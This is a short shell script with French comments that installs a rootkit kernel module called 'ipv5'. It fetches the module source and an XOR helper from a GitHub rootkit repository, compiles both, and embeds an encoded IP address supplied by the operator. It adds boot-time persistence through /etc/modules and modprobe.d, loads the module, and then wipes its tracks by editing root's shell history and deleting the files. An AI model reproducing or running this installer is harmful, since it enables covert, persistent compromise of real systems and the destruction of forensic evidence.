#!/bin/ash

# récuperer le .ko
wget https://github.com/gobelinor/Rootkit-Project/raw/refs/heads/main/mesmodules/unleashed/ipv5.c
wget https://github.com/gobelinor/Rootkit-Project/raw/refs/heads/main/mesmodules/unleashed/Makefile
make

# ajout de ip personnalisé
echo "Tape ton ip:"
read IP_ADDR
if [ -z "$IP_ADDR" ]; then
  echo "ip adresse vide."
  exit 1
fi

wget https://github.com/gobelinor/Rootkit-Project/raw/refs/heads/main/mesmodules/insert/xor.c
gcc -o xor xor.c
encrypted=$(./xor $IP_ADDR)
# echo "ip chiffrée: $encrypted"

# persistence (load le module au demarage)
echo "ipv5" >> /etc/modules
mkdir -p /lib/modules/$(uname -r)/extra
echo "options ipv5 param=$encrypted" > /etc/modprobe.d/ipv5.conf
cp ipv5.ko /lib/modules/$(uname -r)/extra/
depmod -a 2>/dev/null

# load le module
modprobe ipv5

# supprimer les traces
rm ipv5.ko
sed -i '/ipv5/d' /root/.ash_history
sed -i '/insertion/d' /root/.ash_history
rm insertion_script
rm xor
rm xor.c
